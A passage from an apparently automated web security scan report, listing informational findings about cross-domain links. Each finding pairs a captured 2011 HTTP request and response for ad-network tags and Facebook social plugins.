partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZYEMzFzHE0h4uF42A3I5DZGAEkzuUAidMgwR27QIL/woHEdGMgf84PJiD57gAzkOzsYAYKT1QBMueChV/sZuZi4uDg4uLYuY9Z4NDBZe9YgAo2FgOl1n9gBJJPLoDIk2DFb3eDzDh0BMS+8B1EzgSLN/8HkU1AEmgvB5DY7wfkX9wLEl27nxEAzYguzQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 04 May 2011 01:28:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 04-May-2011 01:28:38 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 444

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304904538&custom_user_segments=%2C11265%2C49026%2C49027%2C8%2C50185%2C4625%2C6551%2C48153%2C48156%2C48157%2C10656%2C24493%2C30767%2C14769%2C23864%2C57145%2C10047%2C17857%2C41538%2C13893%2C48201%2C13899%2C13902%2C48080%2C40657%2C26724%2C56808%2C56813%2C57454%2C1150%2C11262"/>');

21.5. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/cnetnews/300x250/cnetnews_atf

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgNDg5LCAgc2l0ZTogICAgICAgICAiY25ldG5ld3MiLCAgYWQ6ICAgICAgICAgICAyOTkwMjcwLCAgbmV0d29yazogICAgICAiaG91c2UiLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIyLTk5OSIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNjg4OWFhYTUtZTZjYi00ZTkyLWI1NzItNDU3ZTQ4MjExYjMyIiwgIHVzZXI6ICAgICAgICAgImFjNWFmZTg5LWRiZTMtNGE5OS05YzYwLTU5ZjRmYjQ5NWNiOSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiY25ldG5ld3NfYXRmIiwgIGRpdjogICAgICAgICAgIjY4ODlhYWE1LWU2Y2ItNGU5Mi1iNTcyLTQ1N2U0ODIxMWIzMiIsICB1cmw6ICAgICAgICAgICJodHRwOi8vY2JzaW50ZXJhY3RpdmUuY29tIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMiwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA2NjA2MywgIG5ldHdvcmtfbmFtZTogIkhvdXNlIEFydCIsICBwdWJsaXNoZXJfbmFtZTogImNic2ludGVyYWN0aXZlIiwgIGVjcG06ICAgICAgICAgIjAuMjUiLCAgZmVjcG06ICAgICAgICAiMC4yNSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAiY25ldG5ld3NfYXRmIiwgIHJ1bGU6ICAgICAgICAgImNuZXRuZXdzX2F0ZiIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMwNjg0MTcsICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5MDg1LCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5OTM4LCAiYnV5IjozMzExLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlRyaWdnaXQgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY5NjE1LCAiYnV5IjoxMjQzLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMDY4NjYyLCAiYnV5IjoxODksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzA2ODc2NywgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDcifQ==
Content-Length: 1837
Content-Type: text/html
Date: Wed, 04 May 2011 01:28:54 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<div style="width:0;height:0">


<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>

<img width="0" height="0" src="http://d.xp1.ru4.com/activity?_o=62795&_t=cm_admeld&redirect=http%3A%2F%2Ftag.admeld.com%2Fmatch%3F%26admeld_adprovider_id=303%26external_user_id=%7euk%7e&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

<script type="text/javascript" src="http://load.exelator.com/load/?p=104&g=060&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=3&admeld_callback=http://tag.admeld.com/pixel"></script>
...[SNIP]...

21.6. http://www.facebook.com/plugins/facepile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/facepile.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=400&max_rows=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.204.36
X-Cnection: close
Date: Wed, 04 May 2011 00:54:05 GMT
Content-Length: 5630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/oCCo725NxLN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...

21.7. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.166.32
X-Cnection: close
Date: Wed, 04 May 2011 00:54:02 GMT
Content-Length: 12036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/oCCo725NxLN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/BurtGoldmanFanPage" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50253_28843894233_1264591_q.jpg" alt="Burt Goldman" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002349914146" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186477_100002349914146_4065373_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001468085334" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/jeffrey.jung" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187703_576645249_6442270_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/paulinejjohnstone" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187071_1798527771_3402167_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000446605055" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195343_100000446605055_2503123_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001420203976" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41636_100001420203976_6544_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000856439128" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187682_100000856439128_5386931_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=752344880" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195306_752344880_1263843_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174463_751075160_782321_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002344565735" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" /><div class="name">
...[SNIP]...

21.8. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=www.facebook.com%2FBurtGoldmanFanPage&layout=button_count&show_faces=true&width=90&action=like&font=lucida+grande&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.154.31
X-Cnection: close
Date: Wed, 04 May 2011 00:53:33 GMT
Content-Length: 6433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

21.9. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=295&colorscheme=light&connections=15&stream=false&header=true&height=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.177.59
X-Cnection: close
Date: Wed, 04 May 2011 00:53:34 GMT
Content-Length: 14499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/oCCo725NxLN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/BurtGoldmanFanPage" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50253_28843894233_1264591_q.jpg" alt="Burt Goldman" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001269015824" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174356_100001269015824_3066847_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174463_751075160_782321_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/jeffrey.jung" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187703_576645249_6442270_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rasheenz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195648_139901512_7604052_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000228493086" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203033_100000228493086_3276926_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000446605055" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195343_100000446605055_2503123_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=752344880" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195306_752344880_1263843_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000856439128" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187682_100000856439128_5386931_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002344565735" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002349914146" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186477_100002349914146_4065373_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001202166078" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001468085334" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/JohnLAustin" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173952_1277064587_1404833_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=731378168" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187170_731378168_6426038_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001420203976" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41636_100001420203976_6544_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

21.10. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=295&colorscheme=light&connections=15&stream=false&header=true&height=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/products
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.205.35
X-Cnection: close
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Length: 14513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/oCCo725NxLN.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/IhQ1j6zON26.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/BurtGoldmanFanPage" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50253_28843894233_1264591_q.jpg" alt="Burt Goldman" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001269015824" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174356_100001269015824_3066847_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001202166078" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=731378168" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187170_731378168_6426038_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rasheenz" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195648_139901512_7604052_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=752344880" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195306_752344880_1263843_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000856439128" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187682_100000856439128_5386931_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/JohnLAustin" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173952_1277064587_1404833_q.jpg" /><div class="name">
...[SNIP]...
